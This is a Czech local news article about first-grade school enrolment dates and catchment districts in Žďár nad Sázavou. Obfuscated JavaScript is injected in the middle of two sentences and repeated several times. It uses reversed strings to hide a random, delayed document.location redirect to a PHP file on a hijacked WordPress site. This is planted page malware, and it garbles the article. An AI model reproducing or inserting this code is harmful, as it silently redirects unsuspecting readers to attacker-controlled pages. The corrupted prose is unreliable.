Rainbow page separator

Budoucí školáky čekají zápisy do prvních tříd 13. a 14. dubna

Středa, 4. dubna 2018

Základní škola Komenského 6 Žďár nad Sázavou

Žďár nad Sázavou / Na pátek 13. a sobotu 14. dubna le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos ve Žďáře připadají zápisy dětí do 1. tříd základních škol pro školní rok 2018/2019. V pátek se uskuteční ve všech čtyřech základních školách (včetně pobočky ZŠ Švermova v Santiniho ulici) v době od 14 do 17 hodin, v sobotu pak od 9 do 11 hodin. Budoucí prvňáci jsou do žďárských základních škol zřizovaných městem přijímáni na základě vyhlášky o spádových obvodech, které se odvíjejí od trvalého bydliště školáka, takže rodiče nemají možnost výběru školy.
Spádový obvod ZŠ Komenského 2 (dvojka) zahrnuje děti bydlící ve Žďáře 3, a [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to v sudých číslech ulice Brodská, od čísla 49 výše v ulici Okružní, v číslech 1 až 28 v ulici Revoluční, dále v ulicích Kopečná, Malá, Strojírenská, U Jezu, V Zahrádkách, 1. máje a také ve Žďáře 1 – ulici Libušínská do čísla 39 a v ulicích Dr. Drože a Kovářova. Na „dvojku“ spadají rovněž školáci ze Lhotky, Skleného a Vysokého.
ZŠ Komenského 6 (trojka) je spádová pro lichá čísla ulice Brodská, ulici Okružní čísel 1 až 45, ulici Revoluční od čísla 29 výše, ulice Komenského, U Klafárku, Hrnčířskou, Kamenickou, Kupeckou, Libickou, K Milířům, Povoznickou, Ryteckou, Sázavskou, Trhovou, U Křížku, Uhlířskou a Vápenickou, dále Žďár 1 – ulici Libušínskou od čísla 40 výše, Žižkovu a Žďár 5.
Do ZŠ Švermova 4 podle spádovosti patří děti bydlící ve Žďáře 2, Žďáře 4, Žďáře 7, Jamách a osadě Stržanov. Obvod ZŠ Palachova 2189/35 (pětka) tvoří Žďár 1 – mimo ulice Dr. Drože, Kovářova, Libušínská a Žižkova, Žďár 6 a osady Mělkovice, Radonín a Veselíčko.